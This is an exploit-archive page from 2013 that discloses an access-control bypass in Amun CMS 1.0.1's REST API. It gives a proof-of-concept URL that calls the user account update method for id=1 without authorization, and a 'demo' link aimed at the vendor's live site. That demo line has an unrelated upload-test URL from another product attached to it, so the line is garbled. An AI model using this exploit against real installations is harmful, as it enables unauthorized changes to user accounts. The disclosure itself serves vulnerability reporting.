Home / exploitsPDF  

Amun CMS 1.0.1 REST API Access Bypass

Posted on 12 October 2013

Amun CMS 1.0.1 REST API No Access Restriction

Author : syst3m_f4ult
Homepage : http://amun-project.org
Vendor : Amun CMS
Version : 1.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-11
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/

exploit : http://127.0.0.1/
index.php/api/user/account/form?format=xml&method=update&id=1

Demo :
http://amun-project.org/index.php/api/user/account/form?format=xml&method=update&id=1<http://demo-en.automne.ws/automne/fckeditor/editor/filemanager/connectors/uploadtest.html>

 

TOP

Malware :

Exploits :